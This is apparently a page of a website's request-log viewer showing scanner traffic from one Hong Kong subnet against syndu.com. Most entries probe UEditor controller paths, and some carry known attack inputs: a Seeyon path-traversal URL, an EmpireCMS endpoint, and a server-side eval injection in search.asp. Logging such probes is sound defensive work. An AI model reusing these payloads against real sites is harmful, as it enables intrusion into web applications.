#26 2024-04-25 15:12:09 event 1146821 GET 301 bytes 169

ann base label observed

Request event observed

/static/Ueditor/controller.ashx

referer

http://www.syndu.com/static/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/static/Ueditor/controller.ashx

referer

http://www.syndu.com/static/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#27 2024-04-25 15:12:08 event 1146820 GET 301 bytes 169

ann base label observed

Request event observed

/admin/Ueditor/net/controller.ashx

referer

http://www.syndu.com/admin/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/admin/Ueditor/net/controller.ashx

referer

http://www.syndu.com/admin/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#28 2024-04-25 15:12:08 event 1146819 GET 301 bytes 169

ann base label observed

Request event observed

/admin/Ueditor/controller.ashx

referer

http://www.syndu.com/admin/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/admin/Ueditor/controller.ashx

referer

http://www.syndu.com/admin/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#29 2024-04-25 15:12:08 event 1146818 GET 301 bytes 169

ann base label observed

Request event observed

/editor/Ueditor/net/controller.ashx

referer

http://www.syndu.com/editor/Ueditor/net/controller.ashx

UA

Mozilla/4.0 (compatible; MSIE 6.0; Linux i686 ; en) Opera 9.70

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/editor/Ueditor/net/controller.ashx

referer

http://www.syndu.com/editor/Ueditor/net/controller.ashx

UA

Mozilla/4.0 (compatible; MSIE 6.0; Linux i686 ; en) Opera 9.70

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#30 2024-04-25 15:12:08 event 1146817 GET 301 bytes 169

ann base label observed

Request event observed

/editor/Ueditor/controller.ashx

referer

http://www.syndu.com/editor/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/editor/Ueditor/controller.ashx

referer

http://www.syndu.com/editor/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#31 2024-04-25 15:12:08 event 1146816 GET 301 bytes 169

ann base label observed

Request event observed

/manager/Ueditor/net/controller.ashx

referer

http://www.syndu.com/manager/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/525.13.

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/manager/Ueditor/net/controller.ashx

referer

http://www.syndu.com/manager/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/525.13.

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#32 2024-04-25 15:12:07 event 1146815 GET 301 bytes 169

ann base label observed

Request event observed

/manager/Ueditor/controller.ashx

referer

http://www.syndu.com/manager/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/manager/Ueditor/controller.ashx

referer

http://www.syndu.com/manager/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#33 2024-04-25 15:12:07 event 1146814 GET 301 bytes 169

ann base label observed

Request event observed

/Controls/Ueditor/net/controller.ashx

referer

http://www.syndu.com/Controls/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Controls/Ueditor/net/controller.ashx

referer

http://www.syndu.com/Controls/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#34 2024-04-25 15:12:07 event 1146813 GET 301 bytes 169

ann base label observed

Request event observed

/Controls/Ueditor/controller.ashx

referer

http://www.syndu.com/Controls/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Controls/Ueditor/controller.ashx

referer

http://www.syndu.com/Controls/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#35 2024-04-25 15:12:07 event 1146812 GET 301 bytes 169

ann base label observed

Request event observed

/content/Ueditor/net/controller.ashx

referer

http://www.syndu.com/content/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.548.0 Safari/534.10

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/content/Ueditor/net/controller.ashx

referer

http://www.syndu.com/content/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.548.0 Safari/534.10

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#36 2024-04-25 15:12:07 event 1146811 GET 301 bytes 169

ann base label observed

Request event observed

/content/Ueditor/controller.ashx

referer

http://www.syndu.com/content/Ueditor/controller.ashx

UA

Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/content/Ueditor/controller.ashx

referer

http://www.syndu.com/content/Ueditor/controller.ashx

UA

Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#37 2024-04-25 15:12:07 event 1146810 GET 301 bytes 169

ann base label observed

Request event observed

/Scripts/ueditor/net/controller.ashx

referer

http://www.syndu.com/Scripts/ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.30)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Scripts/ueditor/net/controller.ashx

referer

http://www.syndu.com/Scripts/ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 ( .NET CLR 3.0.04506.30)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#38 2024-04-25 15:12:06 event 1146809 GET 301 bytes 169

ann base label observed

Request event observed

/Scripts/ueditor/controller.ashx

referer

http://www.syndu.com/Scripts/ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Scripts/ueditor/controller.ashx

referer

http://www.syndu.com/Scripts/ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#39 2024-04-25 15:12:06 event 1146808 GET 301 bytes 169

ann base label observed

Request event observed

/Content/scripts/plugins/Ueditor/net/controller.ashx

referer

http://www.syndu.com/Content/scripts/plugins/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Content/scripts/plugins/Ueditor/net/controller.ashx

referer

http://www.syndu.com/Content/scripts/plugins/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#40 2024-04-25 15:12:06 event 1146807 GET 301 bytes 169

ann base label observed

Request event observed

/Content/scripts/plugins/Ueditor/controller.ashx

referer

http://www.syndu.com/Content/scripts/plugins/Ueditor/controller.ashx

UA

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Content/scripts/plugins/Ueditor/controller.ashx

referer

http://www.syndu.com/Content/scripts/plugins/Ueditor/controller.ashx

UA

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#41 2024-04-25 15:12:06 event 1146806 GET 301 bytes 169

ann base label observed

Request event observed

/Plugin/ueditor/net/controller.ashx

referer

http://www.syndu.com/Plugin/ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Plugin/ueditor/net/controller.ashx

referer

http://www.syndu.com/Plugin/ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#42 2024-04-25 15:12:06 event 1146805 GET 301 bytes 169

ann base label observed

Request event observed

/Plugin/ueditor/controller.ashx

referer

http://www.syndu.com/Plugin/ueditor/controller.ashx

UA

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; …

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Plugin/ueditor/controller.ashx

referer

http://www.syndu.com/Plugin/ueditor/controller.ashx

UA

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#43 2024-04-25 15:12:06 event 1146804 GET 301 bytes 169

ann base label observed

Request event observed

/Ueditor/net/controller.ashx

referer

http://www.syndu.com/Ueditor/net/controller.ashx

UA

Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Ueditor/net/controller.ashx

referer

http://www.syndu.com/Ueditor/net/controller.ashx

UA

Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#44 2024-04-25 15:12:05 event 1146803 GET 301 bytes 169

ann base label observed

Request event observed

/Ueditor/controller.ashx

referer

http://www.syndu.com/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/Ueditor/controller.ashx

referer

http://www.syndu.com/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#45 2024-04-25 15:12:05 event 1146802 GET 301 bytes 169

ann base label observed

Request event observed

/seeyon/thirdpartyController.do.css/..;/ajax.do

referer

http://www.syndu.com/seeyon/thirdpartyController.do.css/..;/ajax.do

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/seeyon/thirdpartyController.do.css/..;/ajax.do

referer

http://www.syndu.com/seeyon/thirdpartyController.do.css/..;/ajax.do

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#46 2024-04-25 15:12:05 event 1146801 POST 301 bytes 169

ann base label observed

Request event observed

/e/DoInfo/ecms.php

referer

http://www.syndu.com/e/DoInfo/ecms.php

UA

Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/e/DoInfo/ecms.php

referer

http://www.syndu.com/e/DoInfo/ecms.php

UA

Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#47 2024-04-25 15:12:04 event 1146800 GET 301 bytes 169

ann base label observed

Request event observed

/search.asp?searchword=%7Bif:eval(action)%7D99&action=Response.Write(Hex(665554))

referer

http://www.syndu.com/search.asp?searchword={if:eval(action)}99&action=Response.Write(Hex(665554))

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/search.asp?searchword=%7Bif:eval(action)%7D99&action=Response.Write(Hex(665554))

referer

http://www.syndu.com/search.asp?searchword={if:eval(action)}99&action=Response.Write(Hex(665554))

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#48 2024-04-25 15:12:04 event 1146799 GET 301 bytes 169

ann base label observed

Request event observed

/search.asp

referer

http://www.syndu.com/search.asp

UA

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; Zune 4.0)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/search.asp

referer

http://www.syndu.com/search.asp

UA

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; Zune 4.0)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#49 2024-04-25 15:12:04 event 1146798 GET 301 bytes 169

ann base label observed

Request event observed

/index.php

referer

http://www.syndu.com/index.php

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php

referer

http://www.syndu.com/index.php

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#50 2024-04-25 15:12:04 event 1146797 GET 301 bytes 169

ann base label observed

Request event observed

/SiteServer/Ajax/ajaxOtherService.aspx

referer

http://www.syndu.com/SiteServer/Ajax/ajaxOtherService.aspx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/SiteServer/Ajax/ajaxOtherService.aspx

referer

http://www.syndu.com/SiteServer/Ajax/ajaxOtherService.aspx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

Page 1 of 4

← Prev Next →